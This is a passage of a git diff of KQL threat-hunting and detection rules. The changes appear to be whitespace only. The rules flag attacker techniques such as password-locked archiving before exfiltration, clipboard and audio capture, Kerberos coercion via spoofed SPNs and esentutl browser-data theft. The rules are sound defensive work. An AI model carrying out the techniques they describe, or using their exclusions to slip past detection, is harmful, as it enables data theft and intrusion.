-// Author: frack113 -// Date: 2023-07-21 -// Level: medium -// Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1570, detection.threat-hunting -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: SMB over QUIC Via Net.EXE +// Author: frack113 +// Date: 2023-07-21 +// Level: medium +// Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1570, detection.threat-hunting +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where ProcessCommandLine contains "/TRANSPORT:QUIC" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql index b8755fb6..4f9ab5da 100644 --- a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql +++ b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql @@ -1,13 +1,13 @@ -// Title: Execution From Webserver Root Folder -// Author: Florian Roth (Nextron Systems) -// Date: 2019-01-16 -// Level: medium -// Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.003, detection.threat-hunting -// False Positives: -// - Various applications -// - Tools that include ping or nslookup command invocations - -DeviceProcessEvents +// Title: Execution From Webserver Root Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003, detection.threat-hunting +// False Positives: +// - Various applications +// - Tools that include ping or nslookup command invocations + +DeviceProcessEvents | where (FolderPath contains "\\wwwroot\\" or FolderPath contains "\\wmpub\\" or FolderPath contains "\\htdocs\\") and (not(((FolderPath contains "bin\\" or FolderPath contains "\\Tools\\" or FolderPath contains "\\SMSComponent\\") and InitiatingProcessFolderPath endswith "\\services.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql b/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql index 630a326e..f6442fe9 100644 --- a/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql +++ b/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql @@ -1,12 +1,12 @@ -// Title: Shell Context Menu Command Tampering -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-03-06 -// Level: low -// Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands. -// MITRE Tactic: Persistence -// Tags: attack.persistence, detection.threat-hunting -// False Positives: -// - Likely from new software installation suggesting to add context menu items. Such as "PowerShell", "Everything", "Git", etc. - -DeviceRegistryEvents +// Title: Shell Context Menu Command Tampering +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-03-06 +// Level: low +// Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands. +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.threat-hunting +// False Positives: +// - Likely from new software installation suggesting to add context menu items. Such as "PowerShell", "Everything", "Git", etc. + +DeviceRegistryEvents | where RegistryKey endswith "\\Software\\Classes*" and RegistryKey endswith "\\shell*" and RegistryKey endswith "\\command*" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql index acba7761..8e46c493 100644 --- a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql +++ b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql @@ -1,14 +1,14 @@ -// Title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-09-02 -// Level: low -// Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. -// The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. -// Investigation of the loading application and its behavior is required to determining if its malicious. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting -// False Positives: -// - Some installers might generate false positives, apply additional filters accordingly. - -DeviceImageLoadEvents +// Title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-09-02 +// Level: low +// Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. +// The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. +// Investigation of the loading application and its behavior is required to determining if its malicious. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting +// False Positives: +// - Some installers might generate false positives, apply additional filters accordingly. + +DeviceImageLoadEvents | where (FolderPath endswith "\\taskschd.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "taskschd.dll") and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Downloads\\") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql index 665416c7..3685b3c2 100644 --- a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql +++ b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql @@ -1,10 +1,10 @@ -// Title: Elevated System Shell Spawned -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2023-11-23 -// Level: medium -// Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting - -DeviceProcessEvents +// Title: Elevated System Shell Spawned +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-11-23 +// Level: medium +// Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting + +DeviceProcessEvents | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "powershell_ise.EXE", "pwsh.dll", "Cmd.Exe"))) and (LogonId =~ "0x3e7" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql b/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql index e2b6695b..be6f72c5 100644 --- a/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql +++ b/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql @@ -1,14 +1,14 @@ -// Title: Creation of an Executable by an Executable -// Author: frack113 -// Date: 2022-03-09 -// Level: low -// Description: Detects the creation of an executable by another executable. -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001, detection.threat-hunting -// False Positives: -// - Software installers -// - Update utilities -// - 32bit applications launching their 64bit versions - -DeviceFileEvents +// Title: Creation of an Executable by an Executable +// Author: frack113 +// Date: 2022-03-09 +// Level: low +// Description: Detects the creation of an executable by another executable. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001, detection.threat-hunting +// False Positives: +// - Software installers +// - Update utilities +// - 32bit applications launching their 64bit versions + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith ".exe" and FolderPath endswith ".exe") and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") or (InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework" and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly") or (InitiatingProcessFolderPath endswith ":\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\cleanmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\dxgiadaptercache.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\Dism.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wuauclt.exe") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\GitHubDesktop\\Update.exe" and FolderPath contains "\\AppData\\Local\\SquirrelTemp\\") or ((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly\\NativeImages_") or ((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\") or (FolderPath contains ":\\Program Files\\" or FolderPath contains ":\\Program Files (x86)\\")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and (FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Squirrel.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\SquirrelTemp\\tempb\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe" and FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\") or (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\svchost.exe" and (FolderPath contains ":\\WUDownloadCache\\" and FolderPath contains "\\WindowsUpdateBox.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" and InitiatingProcessFolderPath endswith "\\Microsoft VS Code\\Code.exe" and FolderPath contains "\\.vscode\\extensions\\") or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or (InitiatingProcessFolderPath contains ":\\WINDOWS\\TEMP\\" or FolderPath contains ":\\WINDOWS\\TEMP\\") or (InitiatingProcessFolderPath contains ":\\WINDOWS\\SoftwareDistribution\\Download\\" and InitiatingProcessFolderPath endswith "\\WindowsUpdateBox.Exe" and FolderPath contains ":\\$WINDOWS.~BT\\Sources\\")))) and (not(((InitiatingProcessFolderPath endswith "\\ChromeSetup.exe" and FolderPath contains "\\Google") or (InitiatingProcessFolderPath contains "\\Python27\\python.exe" and (FolderPath contains "\\Python27\\Lib\\site-packages\\" or FolderPath contains "\\Python27\\Scripts\\" or FolderPath contains "\\AppData\\Local\\Temp\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\SquirrelTemp\\Update.exe" and FolderPath contains "\\AppData\\Local")))) \ No newline at end of file diff --git a/KQL/rules/Collection/7zip_compressing_dump_files.kql b/KQL/rules/Collection/7zip_compressing_dump_files.kql index 5d6b1c5e..97b1da0f 100644 --- a/KQL/rules/Collection/7zip_compressing_dump_files.kql +++ b/KQL/rules/Collection/7zip_compressing_dump_files.kql @@ -1,13 +1,13 @@ -// Title: 7Zip Compressing Dump Files -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-27 -// Level: medium -// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001 -// False Positives: -// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally -// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting - -DeviceProcessEvents +// Title: 7Zip Compressing Dump Files +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: medium +// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally +// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting + +DeviceProcessEvents | where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) \ No newline at end of file diff --git a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql index af43a994..8d1920bf 100644 --- a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql +++ b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql @@ -1,16 +1,16 @@ -// Title: Attempts of Kerberos Coercion Via DNS SPN Spoofing -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-06-20 -// Level: high -// Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line. -// The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure. -// Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts. -// It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records -// to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073. -// If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records, -// or checking for the presence of such records through the `nslookup` command. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187 - -DeviceProcessEvents +// Title: Attempts of Kerberos Coercion Via DNS SPN Spoofing +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-20 +// Level: high +// Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line. +// The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure. +// Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts. +// It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records +// to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073. +// If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records, +// or checking for the presence of such records through the `nslookup` command. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187 + +DeviceProcessEvents | where ProcessCommandLine contains "UWhRCA" and ProcessCommandLine contains "BAAAA" \ No newline at end of file diff --git a/KQL/rules/Collection/audio_capture_via_powershell.kql b/KQL/rules/Collection/audio_capture_via_powershell.kql index 0fdfc724..86e5aa7d 100644 --- a/KQL/rules/Collection/audio_capture_via_powershell.kql +++ b/KQL/rules/Collection/audio_capture_via_powershell.kql @@ -1,12 +1,12 @@ -// Title: Audio Capture via PowerShell -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-24 -// Level: medium -// Description: Detects audio capture via PowerShell Cmdlet. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1123 -// False Positives: -// - Legitimate audio capture by legitimate user. - -DeviceProcessEvents +// Title: Audio Capture via PowerShell +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-24 +// Level: medium +// Description: Detects audio capture via PowerShell Cmdlet. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1123 +// False Positives: +// - Legitimate audio capture by legitimate user. + +DeviceProcessEvents | where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice " \ No newline at end of file diff --git a/KQL/rules/Collection/audio_capture_via_soundrecorder.kql b/KQL/rules/Collection/audio_capture_via_soundrecorder.kql index 631ccf07..c8a4540e 100644 --- a/KQL/rules/Collection/audio_capture_via_soundrecorder.kql +++ b/KQL/rules/Collection/audio_capture_via_soundrecorder.kql @@ -1,12 +1,12 @@ -// Title: Audio Capture via SoundRecorder -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019-10-24 -// Level: medium -// Description: Detect attacker collecting audio via SoundRecorder application. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1123 -// False Positives: -// - Legitimate audio capture by legitimate user. - -DeviceProcessEvents +// Title: Audio Capture via SoundRecorder +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Detect attacker collecting audio via SoundRecorder application. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1123 +// False Positives: +// - Legitimate audio capture by legitimate user. + +DeviceProcessEvents | where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/automated_collection_command_prompt.kql b/KQL/rules/Collection/automated_collection_command_prompt.kql index 4bbf1e5c..60b39179 100644 --- a/KQL/rules/Collection/automated_collection_command_prompt.kql +++ b/KQL/rules/Collection/automated_collection_command_prompt.kql @@ -1,10 +1,10 @@ -// Title: Automated Collection Command Prompt -// Author: frack113 -// Date: 2021-07-28 -// Level: medium -// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1119, attack.credential-access, attack.t1552.001 - -DeviceProcessEvents +// Title: Automated Collection Command Prompt +// Author: frack113 +// Date: 2021-07-28 +// Level: medium +// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1119, attack.credential-access, attack.t1552.001 + +DeviceProcessEvents | where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")) \ No newline at end of file diff --git a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql index 58ea181f..4d252f98 100644 --- a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql +++ b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql @@ -1,13 +1,13 @@ -// Title: Clipboard Collection with Xclip Tool -// Author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC -// Date: 2021-10-15 -// Level: low -// Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. -// Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1115 -// False Positives: -// - Legitimate usage of xclip tools. - -DeviceProcessEvents +// Title: Clipboard Collection with Xclip Tool +// Author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: low +// Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. +// Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1115 +// False Positives: +// - Legitimate usage of xclip tools. + +DeviceProcessEvents | where (ProcessCommandLine contains "-sel" and ProcessCommandLine contains "clip" and ProcessCommandLine contains "-o") and FolderPath contains "xclip" \ No newline at end of file diff --git a/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql b/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql index 6a388610..d8070d43 100644 --- a/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql +++ b/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql @@ -1,12 +1,12 @@ -// Title: Clipboard Data Collection Via OSAScript -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-01-31 -// Level: high -// Description: Detects possible collection of data from the clipboard via execution of the osascript binary -// MITRE Tactic: Collection -// Tags: attack.collection, attack.execution, attack.t1115, attack.t1059.002 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Clipboard Data Collection Via OSAScript +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects possible collection of data from the clipboard via execution of the osascript binary +// MITRE Tactic: Collection +// Tags: attack.collection, attack.execution, attack.t1115, attack.t1059.002 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "clipboard" \ No newline at end of file diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql index 7e685676..85a13b25 100644 --- a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql +++ b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql @@ -1,12 +1,12 @@ -// Title: Compress Data and Lock With Password for Exfiltration With 7-ZIP -// Author: frack113 -// Date: 2021-07-27 -// Level: medium -// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001 -// False Positives: -// - Legitimate activity is expected since compressing files with a password is common. - -DeviceProcessEvents +// Title: Compress Data and Lock With Password for Exfiltration With 7-ZIP +// Author: frack113 +// Date: 2021-07-27 +// Level: medium +// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate activity is expected since compressing files with a password is common. + +DeviceProcessEvents | where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p" \ No newline at end of file diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql index e2d30117..12d2bac8 100644 --- a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql +++ b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql @@ -1,10 +1,10 @@ -// Title: Compress Data and Lock With Password for Exfiltration With WINZIP -// Author: frack113 -// Date: 2021-07-27 -// Level: medium -// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001 - -DeviceProcessEvents +// Title: Compress Data and Lock With Password for Exfiltration With WINZIP +// Author: frack113 +// Date: 2021-07-27 +// Level: medium +// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 + +DeviceProcessEvents | where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe") \ No newline at end of file diff --git a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql index 0054ce84..dec61767 100644 --- a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql +++ b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql @@ -1,13 +1,13 @@ -// Title: Compressed File Creation Via Tar.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3 -// Date: 2023-12-19 -// Level: low -// Description: Detects execution of "tar.exe" in order to create a compressed file. -// Adversaries may abuse various utilities to compress or encrypt data before exfiltration. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -// False Positives: -// - Likely - -DeviceProcessEvents +// Title: Compressed File Creation Via Tar.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3 +// Date: 2023-12-19 +// Level: low +// Description: Detects execution of "tar.exe" in order to create a compressed file. +// Adversaries may abuse various utilities to compress or encrypt data before exfiltration. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 +// False Positives: +// - Likely + +DeviceProcessEvents | where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql index 64801bdb..2ff126a0 100644 --- a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql +++ b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql @@ -1,13 +1,13 @@ -// Title: Compressed File Extraction Via Tar.EXE -// Author: AdmU3 -// Date: 2023-12-19 -// Level: low -// Description: Detects execution of "tar.exe" in order to extract compressed file. -// Adversaries may abuse various utilities in order to decompress data to avoid detection. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -// False Positives: -// - Likely - -DeviceProcessEvents +// Title: Compressed File Extraction Via Tar.EXE +// Author: AdmU3 +// Date: 2023-12-19 +// Level: low +// Description: Detects execution of "tar.exe" in order to extract compressed file. +// Adversaries may abuse various utilities in order to decompress data to avoid detection. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 +// False Positives: +// - Likely + +DeviceProcessEvents | where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql b/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql index ef212c65..8cb84e79 100644 --- a/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql +++ b/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql @@ -1,10 +1,10 @@ -// Title: Data Copied To Clipboard Via Clip.EXE -// Author: frack113 -// Date: 2021-07-27 -// Level: low -// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1115 - -DeviceProcessEvents +// Title: Data Copied To Clipboard Via Clip.EXE +// Author: frack113 +// Date: 2021-07-27 +// Level: low +// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1115 + +DeviceProcessEvents | where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/esentutl_steals_browser_information.kql b/KQL/rules/Collection/esentutl_steals_browser_information.kql index e4a5393d..6e265852 100644 --- a/KQL/rules/Collection/esentutl_steals_browser_information.kql +++ b/KQL/rules/Collection/esentutl_steals_browser_information.kql @@ -1,12 +1,12 @@ -// Title: Esentutl Steals Browser Information -// Author: frack113 -// Date: 2022-02-13 -// Level: medium -// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1005 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Esentutl Steals Browser Information +// Author: frack113 +// Date: 2022-02-13 +// Level: medium 